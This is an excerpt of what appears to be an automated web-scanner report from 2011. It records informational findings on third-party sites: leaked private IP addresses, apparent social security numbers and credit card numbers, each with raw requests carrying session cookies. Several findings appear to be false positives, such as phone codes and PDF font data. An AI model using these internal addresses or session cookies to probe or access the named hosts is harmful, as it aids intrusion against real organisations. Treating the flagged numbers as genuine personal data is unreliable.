<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Privacy and Securi
...[SNIP]...
<strong>reportphish@wellsfargo.com</strong>
...[SNIP]...

20. Private IP addresses disclosed  previous  next
There are 7 instances of this issue:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.


20.1. http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.japantimes.co.jp
Path:   /cgi-bin/fl20110109x1.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /cgi-bin/fl20110109x1.html HTTP/1.1
Host: search.japantimes.co.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 01:04:50 GMT
Server: Apache
X-Powered-By: PHP/4.4.2
Set-Cookie: LINGO_L5U=xyz; expires=Sun, 06 Jun 2010 00:00:00 GMT; path=/; domain=.search.japantimes.co.jp
Set-Cookie: COOKIECHECH=1; path=/
Cache-Control: max-age=900
Expires: Thu, 03 Feb 2011 01:19:50 GMT
Content-Type: text/html
Content-Language: en
X-Cache: MISS from form1.japantimes.co.jp
Connection: close
X-Backend: 192.168.1.120:80

...

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head
...[SNIP]...

20.2. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 01:19:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=k2q7s7bd7dtdm25nb0rni4rg00; path=/
Connection: close
Content-Length: 73954

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--192.168.42.91-->
...[SNIP]...

20.3. http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thehill.com
Path:   /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more HTTP/1.1
Host: thehill.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:59:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 03 Feb 2011 02:06:07 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Age: 517
Content-Length: 73989
Content-Type: text/html; charset=utf-8
Set-Cookie: PHPSESSID=ibnj4s93bq0ff08n1ed2l334q1; path=/
Connection: close

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--192.168.42.41-->
...[SNIP]...

20.4. http://www.firstnational.com/config/html/en/searchresults.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /config/html/en/searchresults.asp

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /config/html/en/searchresults.asp HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:41:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25669
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASASQCD=FHHAGHGAJJNGHOEBODOGIMJG; path=/
Cache-control: private


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<a ctype="advanced" href="search?site=default_collection&amp;client=default_frontend&amp;output=xml_no_dtd&amp;proxystylesheet=default_frontend&amp;ie=UTF-8&amp;ip=172.25.48.11&amp;access=p&amp;sort=date%3AD%3AL%3Ad1&amp;entqr=3&amp;oe=UTF-8&amp;ud=1&amp;proxycustom=<ADVANCED/&gt;">
...[SNIP]...

20.5. http://www.firstnational.com/config/html/en/searchresults.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstnational.com
Path:   /config/html/en/searchresults.asp

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /config/html/en/searchresults.asp HTTP/1.1
Host: www.firstnational.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163731496.1296684069.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=163731496.592844663.1296684069.1296684069.1296684069.1; __utmc=163731496; ASPSESSIONIDQSBARTCD=GDACFCGAGODIEJDBAPGNINLP; __utmb=163731496;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:19:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25669
Content-Type: text/html
Cache-control: private


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="
...[SNIP]...
<a ctype="advanced" href="search?site=default_collection&amp;client=default_frontend&amp;output=xml_no_dtd&amp;proxystylesheet=default_frontend&amp;ie=UTF-8&amp;ip=172.25.49.11&amp;access=p&amp;sort=date%3AD%3AL%3Ad1&amp;entqr=3&amp;oe=UTF-8&amp;ud=1&amp;proxycustom=<ADVANCED/&gt;">
...[SNIP]...

20.6. http://www.google.com/sdch/GeNLY2f-.dct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/GeNLY2f-.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /sdch/GeNLY2f-.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7
If-Modified-Since: Tue, 01 Feb 2011 09:48:40 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Wed, 02 Feb 2011 19:39:42 GMT
Date: Wed, 02 Feb 2011 22:24:47 GMT
Expires: Wed, 02 Feb 2011 22:24:47 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 107132

Domain: .google.com
Path: /search

- Google Search</title><script>window.google={kEI:" QT0T WJ_5AKtpypmg8",kEXPI:"27344,27642,27744WJ_5AKtpypmg8",expi:"27344,27642,27744CMMWJ_5
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: 4AUACFJFdYwJ:search.aol.com/+aolMJE2Iq51jh0J:webmail.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'
...[SNIP]...
<a href="/search?hl=en&amp;q=inauthor:&quot; http://172.31.196.197:8888/search?q=cache: dictionary.reference.com/browse/ &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','1 2','','0CD ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:v_TYzMSa2vkJ:www.whitepages.com/+ &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','1 wQqwMoA ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:J: i en.wikipedia.org/wiki/DirecTV+direct www.directv.com/DTVAPP/epg/theGuide.jsp+direct www.directv.com/DTVAPP/content/ +direct
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','6','','0C c ')">
...[SNIP]...
<a href="/search?hl=en&amp;q=inauthor:&quot;http://172.31.196.197:8888/search?q=cache: " onmousedown="return clk(this.href,'','','',' 7','','0C ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','1','','0CC QIDAA')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: J:explore.live.com/windows-live- &amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','',' &amp;tbo=1&amp;sa=X&amp;ei=4AT0TsWJ_5AKtpypmg
...[SNIP]...
<a href="/search?hl=en&amp;q=related: s&amp;tbo=1&amp;sa=X&amp;ei=4AT0Thttp://172.31.196.197:8888/search?q=cache:&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us" onmousedown="return clk(this.href,'','','','10','','0C opics.nytimes.com/top/news/business/companies/ WJ_5AKtpypm
...[SNIP]...

20.7. http://www.viglink.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.viglink.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.viglink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Content-Language: en
Content-Type: text/html;charset=UTF-8
Date: Wed, 02 Feb 2011 23:45:27 GMT
Expires: -1
Pragma: no-cache
Set-Cookie: vglnk.Agent.p=38d8b11a817b037b4b6a4f8ea1982e0a; Domain=.viglink.com; Expires=Sat, 30-Jan-2021 23:45:27 GMT; Path=/
Set-Cookie: JSESSIONID=850E1DB3E66B214055AFE3AAEB898474; Path=/
Vary: Accept-Encoding
Connection: Close
Content-Length: 14626

<!doctype html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>Affiliate Every Link on the Web with VigLink</title>

<meta http-equiv="Content-type" content="text/h
...[SNIP]...
<!-- Served by: www.viglink.com (10.242.201.220) -->
...[SNIP]...

21. Social security numbers disclosed  previous  next
There are 3 instances of this issue:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.


21.1. http://m.usa.visa.com/m/assistance/lost.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://m.usa.visa.com
Path:   /m/assistance/lost.jsp

Issue detail

The following social security number was disclosed in the response:

Request

GET /m/assistance/lost.jsp HTTP/1.1
Host: m.usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Length: 28817
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: JSESSIONID=0001adTeLbI5vDToIoqioYMrI8g:-1042HAI; Path=/
Server: Web2
Date: Wed, 02 Feb 2011 22:00:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<meta
...[SNIP]...
<span class="cta-lost-number hidden">Dial 002-11-0011, when prompted enter 866-654-0163</span>
...[SNIP]...

21.2. http://usa.visa.com/personal/security/get-help-now.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://usa.visa.com
Path:   /personal/security/get-help-now.html

Issue detail

The following social security number was disclosed in the response:

Request

GET /personal/security/get-help-now.html HTTP/1.1
Host: usa.visa.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visaHome=0; __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; __utmc=60493353; __utmb=60493353.3.9.1296683997731

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 10 Dec 2010 18:49:59 GMT
Accept-Ranges: bytes
ETag: "80a578b9b98cb1:0"
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 21:59:35 GMT
Connection: close
P3P:
Content-Length: 28302


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<option value='002-11-0011 &diams;866-654-0163'>
...[SNIP]...

21.3. http://usa.visa.com/personal/using_visa/visa_travelers_cheques.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://usa.visa.com
Path:   /personal/using_visa/visa_travelers_cheques.html

Issue detail

The following social security number was disclosed in the response:

Request

GET /personal/using_visa/visa_travelers_cheques.html HTTP/1.1
Host: usa.visa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: visaHome=0; __utmz=60493353.1296683997.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60493353.2058023426.1296683997.1296683997.1296683997.1; visaCookie=f8eef748481e0000a3d3494d4ba40d0015040000; __utmc=60493353; __utmb=60493353.12.5.1296684032693; visaAnonCookie=f8eef748481e0000a3d3494d4ba40d0014040000;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 21 Oct 2010 21:42:49 GMT
ETag: "8092d1e76871cb1:0"
Server: Microsoft-IIS/7.0
Date: Wed, 02 Feb 2011 22:02:55 GMT
Content-Length: 28090
Connection: close
P3P:


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...
<td>020-79-3108</td>
...[SNIP]...

22. Credit card numbers disclosed  previous  next
There are 3 instances of this issue:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.


22.1. http://www.arbornetworks.com/dmdocuments/ISR2008_US.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /dmdocuments/ISR2008_US.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /dmdocuments/ISR2008_US.pdf HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:55:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
Last-Modified: Mon, 17 Nov 2008 20:40:47 GMT
ETag: "a4793-15188e-45be897f811c0"
Accept-Ranges: bytes
Content-Length: 1382542
Connection: close
Content-Type: application/pdf

%PDF-1.4
%....
1 0 obj
<<
/SM 0.001
/OPM 1
/Type/ExtGState
>>
endobj
2 0 obj
<<
/BitsPerSample 8
/Domain[0 1]
/Size[255]
/FunctionType 0
/Range[0 1 0 1 0 1 0 1]
/Length 1020
>>
stream
................
...[SNIP]...
X+AkzidenzGroteskBE-Md
/Name/F8
/Type/Font
/Widths[271 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 562 0 0 0 562 0 0 0 0 0 0 0 0 0 0 0 0 646 0 0 0 0 0 750 0 0 0 0 521 0 0 0 625 0 0 667 0 0 0 0 0 0 0 0 0 0 0 0 0 542 583 500 583 562 0 583 0 250 0 542 0 0 562 583 0 0 354 521 313 0 0 0 0 0 500 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
...[SNIP]...
AQ+AkzidenzGroteskBE-Md
/Name/F11
/Type/Font
/Widths[271 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 562 0 562 0 0 0 0 0 562 0 0 0 0 0 0 0 0 0 0 0 708 0 0 750 0 0 0 0 0 0 0 0 0 0 646 0 0 0 0 0 0 0 0 0 0 0 0 0 0 542 583 500 583 562 0 583 583 250 0 0 0 0 562 583 583 0 354 521 313 583]
/FirstChar 32
/Encoding 120 0 R
/LastChar 117
/FontDescriptor 122 0 R
>
...[SNIP]...
<
/Subtype/Type1
/BaseFont/YSOHHB+AkzidenzGroteskBE-Light
/Name/F16
/Type/Font
/Widths[271 0 0 0 0 875 0 0 0 0 0 667 167 354 167 0 583 583 583 583 583 583 0 0 0 0 208 0 0 0 0 0 0 646 667 0 0 0 0 708 0 229 0 0 0 792 708 708 625 0 646 604 0 0 0 0 0 0 0 0 0 0 0 0 0 500 521 479 521 521 0 542 521 208 0 500 208 0 521 521 521 0 313 458 292 521 417 688 0 437 396 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 583]
/FirstChar 32
/Encoding 140 0 R
/LastChar 177
/FontDescriptor 142 0 R
>
...[SNIP]...

22.2. http://www.arbornetworks.com/dmdocuments/WISP_US_12sept07.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /dmdocuments/WISP_US_12sept07.pdf

Issue detail

The following credit card numbers were disclosed in the response:

Request

GET /dmdocuments/WISP_US_12sept07.pdf HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:54:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
Last-Modified: Fri, 31 Oct 2008 18:29:54 GMT
ETag: "a478b-1c554b-45a90c8976c80"
Accept-Ranges: bytes
Content-Length: 1856843
Connection: close
Content-Type: application/pdf

%PDF-1.6%....
401 0 obj <</Linearized 1/L 980268/O 404/E 48595/N 32/T 972205/H [ 1136 1846]>>endobj xref401 420000000016 00000 n
0000002982 00000 n
0000003083 00000 n
0000003211 0
...[SNIP]...
</Subtype/Type1/FontDescriptor 438 0 R/LastChar 89/Widths[250 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 396 0 396 0 0 0 0 396 0 0 0 0 0 0 0 0 0 437 479 458 479 417 396 0 0 229 0 0 375 688 500 479 458 0 479 458 396 479 0 708 0 417]/BaseFont/GONGFE+AkzidenzGroteskBE-BoldCn/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
46 667 667 688 604 562 708 729 229 500 667 562 792 708 708 625 708 646 604 542 688 604 875 667 625 583 0 0 0 0 500 0 500 521 479 521 521 313 542 521 208 208 500 208 771 521 521 521 500 313 458 292 521 417 688 458 437 396 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 833 833 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 583 688 292 292 0 167]/Name/
...[SNIP]...
</Subtype/Type1/FontDescriptor 210 0 R/LastChar 209/Widths[292 0 0 0 0 0 0 0 0 0 0 0 0 313 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 667 0 0 0 0 0 0 0 0 0 0 542 0 0 0 646 0 0 667 0 0 583 0 0 0 0 0 0 0 0 0 0 500 0 500 562 521 0 542 0 0 0 479 0 0 542 542 0 0 313 479 271 0 0 0 0 0 0 0 0 0 0 292 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 292 0 0 292 0 292 292 0 0 29
...[SNIP]...
271 271 271 271 0 0 0 0 0 0 0 0 0 0 0 0 354 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 646 0 688 0 0 0 0 0 292 0 0 0 812 0 0 625 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 542 0 500 0 562 313 583 583 250 0 542 0 875 562 583 583 0 354 521 313 583 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 708 0 0 0 0 0 0 0 0 271 0 0 0 0 0 0 0 0 0 0 0 0 354]/BaseFont/OPGICF+AkzidenzGroteskBE-Md/FirstChar 0/Encoding/WinAnsiEncoding
...[SNIP]...
</Subtype/Type1/FontDescriptor 181 0 R/LastChar 211/Widths[271 0 0 0 0 875 0 0 313 313 0 0 167 354 167 479 583 583 583 583 583 583 583 583 0 583 208 0 0 0 0 0 0 646 667 667 688 0 562 0 729 229 0 0 562 792 708 708 625 0 646 604 542 688 0 875 0 625 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 208 500 208 771 521 521 521 500 313 458 292 521 417 688 458 437
...[SNIP]...
83 583 208 0 0 0 0 0 0 646 667 667 0 0 562 0 729 229 500 0 0 0 708 708 625 0 646 604 542 688 0 0 667 0 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 208 500 208 771 521 521 521 500 313 458 292 521 417 688 458 437 396 0 0 0 0 271 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 271 0 0 271 0 271 271 0 0 271 271 271 271 271 0 0 271 0 0 0 0 0 271 0 271 271 0 0 0 271 0 0 0 0 0 0
...[SNIP]...
667 0 479 0 646 667 667 688 0 562 708 729 229 0 0 562 792 708 708 625 708 646 604 542 688 0 875 0 625 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 208 500 208 771 521 521 521 500 313 458 292 521 417 688 458 437 396 0 0 0 0 271 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 271 0 0 271 0 271 271 0 0 271 271 271 271 271 0 0 271 0 0 0 0 0 271 0 271 271 0 0 0 271 0 0 0 0 0 0
...[SNIP]...
e/Type1/FontDescriptor 200 0 R/LastChar 121/Widths[271 0 0 0 0 0 0 0 0 0 0 0 0 354 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 729 292 0 0 0 0 0 0 0 0 646 0 0 0 604 0 0 0 0 0 0 0 0 0 0 542 583 500 583 562 313 583 0 250 0 0 250 0 562 583 0 0 354 521 313 583 0 0 0 479]/BaseFont/OPGICF+AkzidenzGroteskBE-Md/FirstChar 32/Encoding/WinAnsiEncoding/Type/Font>
...[SNIP]...
583 0 208 0 667 0 667 0 0 646 0 667 0 0 562 0 729 229 0 0 0 792 708 708 625 0 646 604 542 0 604 875 0 0 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 0 500 208 771 521 521 521 500 313 458 292 521 417 688 0 437 396 0 0 0 0 271 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 271 0 0 271 0 271 271 0 0 271 271 271 271 271 0 0 271 0 0 0 0 0 271 0 271 271 0 0 0 271 0 0 0 0 0 0 0 0
...[SNIP]...
</Subtype/Type1/FontDescriptor 181 0 R/LastChar 211/Widths[271 208 0 0 0 875 0 0 313 313 0 0 167 354 167 479 0 583 583 583 583 583 583 583 0 0 208 0 0 0 0 0 0 646 667 667 688 604 562 0 729 229 0 0 0 792 708 708 625 0 646 604 542 688 0 875 0 625 0 0 0 0 0 0 0 500 521 479 521 521 313 542 521 208 0 500 208 771 521 521 521 500 313 458 292 521 417 688 458 437 396 0 0 0 0 271 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
...[SNIP]...
